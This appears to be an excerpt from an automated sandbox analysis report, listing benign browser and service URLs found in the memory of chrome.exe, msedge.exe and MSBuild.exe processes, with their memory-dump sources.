Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1780351566.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1775910979.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1780351566.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1775910979.00007BAC01BDC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msedge.exe, 00000009.00000003.1752802941.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrole.g
Source: msedge.exe, 00000009.00000003.1762745938.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.co
Source: msedge.exe, 00000009.00000003.1752802941.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.co8
Source: msedge.exe, 00000009.00000003.1752083653.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: msedge.exe, 00000009.00000003.1744038243.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1751870106.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1756439726.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1748041920.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1748896730.00007BAC0260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744137382.00007BAC006D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1751010732.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1756409493.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1760529042.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1755167981.00007BAC027E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1752566198.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1749888201.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744792503.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764665362.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1749629994.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1755578135.00007BAC006D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744687066.00007BAC007E0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764712800.00007BAC006D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1747383933.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744751563.00007BAC02194000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1749508285.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore/
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000005.00000003.1614571580.0000123802E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615143243.0000123802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616242346.0000123802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1614541984.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1614620498.0000123803064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1613431845.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618476289.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1613677644.0000123802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618672537.0000123803064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1625346370.0000123802EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618311202.0000123802EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: msedge.exe, 00000009.00000003.1748226713.00007BAC025CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoress
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreure
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000005.00000003.1594553853.00002F04002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1594571758.00002F04002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000005.00000003.1612419052.000012380255C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chromecache_168.7.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_168.7.dr String found in binary or memory: https://content.googleapis.com
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754195245.00007BAC02580000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754142197.00007BAC027F4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754391416.00007BAC01CE4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754351019.00007BAC02964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report
